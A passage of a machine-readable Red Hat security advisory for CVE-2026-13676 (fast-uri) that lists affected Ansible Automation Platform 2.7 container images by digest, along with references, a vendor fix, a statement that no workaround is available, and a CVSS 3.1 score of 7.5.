"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-13676"
},
{
"category": "external",
"summary": "RHBZ#2494197",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2494197"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-13676",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-13676"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-13676",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-13676"
},
{
"category": "external",
"summary": "https://cna.openjsf.org/security-advisories.html",
"url": "https://cna.openjsf.org/security-advisories.html"
},
{
"category": "external",
"summary": "https://github.com/fastify/fast-uri/security/advisories/GHSA-4c8g-83qw-93j6",
"url": "https://github.com/fastify/fast-uri/security/advisories/GHSA-4c8g-83qw-93j6"
}
],
"release_date": "2026-06-29T13:22:44.674000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T18:38:09+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.7#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50340"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
